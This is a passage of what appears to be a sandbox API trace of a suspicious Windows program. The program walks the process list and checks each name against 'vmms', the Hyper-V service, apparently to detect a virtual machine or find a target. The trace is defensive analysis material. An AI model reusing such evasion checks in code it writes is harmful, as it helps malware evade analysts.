lpUsedDefaultChar=0x0) returned 12 [0101.579] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0101.579] StrStrIA (lpFirst="svchost.exe", lpSrch="vmms") returned 0x0 [0101.579] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0101.580] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0101.580] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x356f6c0 [0101.580] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x356f6c0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0101.580] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0101.580] StrStrIA (lpFirst="svchost.exe", lpSrch="vmms") returned 0x0 [0101.580] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0101.581] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0101.581] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x356f6d8 [0101.581] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x356f6d8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0101.581] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0101.581] StrStrIA (lpFirst="svchost.exe", lpSrch="vmms") returned 0x0 [0101.581] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0101.583] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spoolsv.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0101.583] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x356f7c8 [0101.583] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spoolsv.exe", cchWideChar=-1, lpMultiByteStr=0x356f7c8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoolsv.exe", lpUsedDefaultChar=0x0) returned 12 [0101.583] lstrcpyA (in: lpString1=0x567fabc, lpString2="spoolsv.exe" | out: lpString1="spoolsv.exe") returned="spoolsv.exe" [0101.583] StrStrIA (lpFirst="spoolsv.exe", lpSrch="vmms") returned 0x0 [0101.583] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x69c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0101.584] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0101.584] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x356f600 [0101.584] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x356f600, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0101.584] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0101.584] StrStrIA (lpFirst="svchost.exe", lpSrch="vmms") returned 0x0 [0101.584] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x554, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0101.585] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="audiodg.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0101.585] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x356f6f0 [0101.585] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="audiodg.exe", cchWideChar=-1, lpMultiByteStr=0x356f6f0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="audiodg.exe", lpUsedDefaultChar=0x0) returned 12 [0101.585] lstrcpyA (in: lpString1=0x567fabc, lpString2="audiodg.exe" | out: lpString1="audiodg.exe") returned="audiodg.exe" [0101.585] StrStrIA (lpFirst="audiodg.exe", lpSrch="vmms") returned 0x0 [0101.585] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x708, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x3ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0101.587] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="sihost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0101.587] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x356f618 [0101.587] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="sihost.exe", cchWideChar=-1, lpMultiByteStr=0x356f618, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sihost.exe", lpUsedDefaultChar=0x0) returned 11 [0101.587] lstrcpyA (in: lpString1=0x567fabc, lpString2="sihost.exe" | out: lpString1="sihost.exe") returned="sihost.exe" [0101.587] StrStrIA (lpFirst="sihost.exe", lpSrch="vmms") returned 0x0 [0101.587] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x720, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0101.588] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0101.588] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x356f828 [0101.588] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x356f828, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0101.588] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0101.593] StrStrIA (lpFirst="svchost.exe", lpSrch="vmms") returned 0x0 [0101.593] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x3ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0101.594] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="taskhostw.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0101.594] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x356f720 [0101.594] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="taskhostw.exe", cchWideChar=-1, lpMultiByteStr=0x356f720, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 14 [0101.594] lstrcpyA (in: lpString1=0x567fabc, lpString2="taskhostw.exe" | out: lpString1="taskhostw.exe") returned="taskhostw.exe" [0101.594] StrStrIA (lpFirst="taskhostw.exe", lpSrch="vmms") returned 0x0 [0101.594] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x560, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3e, th32ParentProcessID=0x568, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0101.595] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="explorer.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0101.595] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x356f858 [0101.595] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="explorer.exe", cchWideChar=-1, lpMultiByteStr=0x356f858, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="explorer.exe", lpUsedDefaultChar=0x0) returned 13 [0101.596] lstrcpyA (in: lpString1=0x567fabc, lpString2="explorer.exe" | out: lpString1="explorer.exe") returned="explorer.exe" [0101.596] StrStrIA (lpFirst="explorer.exe", lpSrch="vmms") returned 0x0 [0101.596] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x818, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0101.597] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0101.597] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x357ecc0 [0101.597] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=-1, lpMultiByteStr=0x357ecc0, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OfficeClickToRun.exe", lpUsedDefaultChar=0x0) returned 21 [0101.597] lstrcpyA (in: lpString1=0x567fabc, lpString2="OfficeClickToRun.exe" | out: lpString1="OfficeClickToRun.exe") returned="OfficeClickToRun.exe" [0101.597] StrStrIA (lpFirst="OfficeClickToRun.exe", lpSrch="vmms") returned 0x0 [0101.597] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x84c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="SecurityHealthService.exe")) returned 1 [0101.598] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="SecurityHealthService.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0101.598] LocalAlloc (uFlags=0x40, uBytes=0x1a) returned 0x357e938 [0101.598] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="SecurityHealthService.exe", cchWideChar=-1, lpMultiByteStr=0x357e938, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SecurityHealthService.exe", lpUsedDefaultChar=0x0) returned 26 [0101.598] lstrcpyA (in: lpString1=0x567fabc, lpString2="SecurityHealthService.exe" | out: lpString1="SecurityHealthService.exe") returned="SecurityHealthService.exe" [0101.598] StrStrIA (lpFirst="SecurityHealthService.exe", lpSrch="vmms") returned 0x0 [0101.598] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x4, pcPriClassBase=8, dwFlags=0x0, szExeFile="Memory Compression")) returned 1 [0101.600] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="Memory Compression", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0101.600] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x357ece0 [0101.600] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="Memory Compression", cchWideChar=-1, lpMultiByteStr=0x357ece0, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Memory Compression", lpUsedDefaultChar=0x0) returned 19 [0101.600] lstrcpyA (in: lpString1=0x567fabc, lpString2="Memory Compression" | out: lpString1="Memory Compression") returned="Memory Compression" [0101.600] StrStrIA (lpFirst="Memory Compression", lpSrch="vmms") returned 0x0 [0101.600] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb3c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0101.601] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ShellExperienceHost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0101.601] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0x357ef20 [0101.601] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ShellExperienceHost.exe", cchWideChar=-1, lpMultiByteStr=0x357ef20, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ShellExperienceHost.exe", lpUsedDefaultChar=0x0) returned 24 [0101.601] lstrcpyA (in: lpString1=0x567fabc, lpString2="ShellExperienceHost.exe" | out: lpString1="ShellExperienceHost.exe") returned="ShellExperienceHost.exe" [0101.601] StrStrIA (lpFirst="ShellExperienceHost.exe", lpSrch="vmms") returned 0x0 [0101.601] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0101.602] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="SearchUI.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0101.603] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x356f738 [0101.603] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="SearchUI.exe", cchWideChar=-1, lpMultiByteStr=0x356f738, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SearchUI.exe", lpUsedDefaultChar=0x0) returned 13 [0101.603] lstrcpyA (in: lpString1=0x567fabc, lpString2="SearchUI.exe" | out: lpString1="SearchUI.exe") returned="SearchUI.exe" [0101.603] StrStrIA (lpFirst="SearchUI.exe", lpSrch="vmms") returned 0x0 [0101.603] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbe4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0101.604] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="RuntimeBroker.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0101.604] LocalAlloc (uFlags=0x40, uBytes=0x12) returned 0x357f1c0 [0101.604] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="RuntimeBroker.exe", cchWideChar=-1, lpMultiByteStr=0x357f1c0, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RuntimeBroker.exe", lpUsedDefaultChar=0x0) returned 18 [0101.604] lstrcpyA (in: lpString1=0x567fabc, lpString2="RuntimeBroker.exe" | out: lpString1="RuntimeBroker.exe") returned="RuntimeBroker.exe" [0101.604] StrStrIA (lpFirst="RuntimeBroker.exe", lpSrch="vmms") returned 0x0 [0101.605] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0101.606] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="WmiPrvSE.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0101.606] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x356f750 [0101.606] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="WmiPrvSE.exe", cchWideChar=-1, lpMultiByteStr=0x356f750, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WmiPrvSE.exe", lpUsedDefaultChar=0x0) returned 13 [0101.606] lstrcpyA (in: lpString1=0x567fabc, lpString2="WmiPrvSE.exe" | out: lpString1="WmiPrvSE.exe") returned="WmiPrvSE.exe" [0101.606] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="vmms") returned 0x0 [0101.606] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="pending.exe")) returned 1 [0101.607] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="pending.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0101.607] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x356f630 [0101.607] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="pending.exe", cchWideChar=-1, lpMultiByteStr=0x356f630, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="pending.exe", lpUsedDefaultChar=0x0) returned 12 [0101.607] lstrcpyA (in: lpString1=0x567fabc, lpString2="pending.exe" | out: lpString1="pending.exe") returned="pending.exe" [0101.607] StrStrIA (lpFirst="pending.exe", lpSrch="vmms") returned 0x0 [0101.607] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="appointmentimpressed.exe")) returned 1 [0101.608] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="appointmentimpressed.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0101.608] LocalAlloc (uFlags=0x40, uBytes=0x19) returned 0x357e6b8 [0101.609] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="appointmentimpressed.exe", cchWideChar=-1, lpMultiByteStr=0x357e6b8, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="appointmentimpressed.exe", lpUsedDefaultChar=0x0) returned 25 [0101.609] lstrcpyA (in: lpString1=0x567fabc, lpString2="appointmentimpressed.exe" | out: lpString1="appointmentimpressed.exe") returned="appointmentimpressed.exe" [0101.609] StrStrIA (lpFirst="appointmentimpressed.exe", lpSrch="vmms") returned 0x0 [0101.609] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="swing prefer.exe")) returned 1 [0101.610] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="swing prefer.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0101.610] LocalAlloc (uFlags=0x40, uBytes=0x11) returned 0x357f440 [0101.610] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="swing prefer.exe", cchWideChar=-1, lpMultiByteStr=0x357f440, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="swing prefer.exe", lpUsedDefaultChar=0x0) returned 17 [0101.610] lstrcpyA (in: lpString1=0x567fabc, lpString2="swing prefer.exe" | out: lpString1="swing prefer.exe") returned="swing prefer.exe" [0101.610] StrStrIA (lpFirst="swing prefer.exe", lpSrch="vmms") returned 0x0 [0101.610] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x384, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="vietnamese_mature_hat.exe")) returned 1 [0101.611] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="vietnamese_mature_hat.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0101.611] LocalAlloc (uFlags=0x40, uBytes=0x1a) returned 0x357e960 [0101.611] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="vietnamese_mature_hat.exe", cchWideChar=-1, lpMultiByteStr=0x357e960, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="vietnamese_mature_hat.exe", lpUsedDefaultChar=0x0) returned 26 [0101.612] lstrcpyA (in: lpString1=0x567fabc, lpString2="vietnamese_mature_hat.exe" | out: lpString1="vietnamese_mature_hat.exe") returned="vietnamese_mature_hat.exe" [0101.612] StrStrIA (lpFirst="vietnamese_mature_hat.exe", lpSrch="vmms") returned 0x0 [0101.612] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="nights-attending.exe")) returned 1 [0101.613] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="nights-attending.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0101.613] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x357f280 [0101.613] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="nights-attending.exe", cchWideChar=-1, lpMultiByteStr=0x357f280, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="nights-attending.exe", lpUsedDefaultChar=0x0) returned 21 [0101.613] lstrcpyA (in: lpString1=0x567fabc, lpString2="nights-attending.exe" | out: lpString1="nights-attending.exe") returned="nights-attending.exe" [0101.613] StrStrIA (lpFirst="nights-attending.exe", lpSrch="vmms") returned 0x0 [0101.613] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x51c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="installed.exe")) returned 1 [0101.614] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="installed.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0101.614] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x356f648 [0101.614] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="installed.exe", cchWideChar=-1, lpMultiByteStr=0x356f648, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="installed.exe", lpUsedDefaultChar=0x0) returned 14 [0101.614] lstrcpyA (in: lpString1=0x567fabc, lpString2="installed.exe" | out: lpString1="installed.exe") returned="installed.exe" [0101.614] StrStrIA (lpFirst="installed.exe", lpSrch="vmms") returned 0x0 [0101.614] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x794, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="references compounds.exe")) returned 1 [0101.616] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="references compounds.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0101.616] LocalAlloc (uFlags=0x40, uBytes=0x19) returned 0x357e7a8 [0101.616] 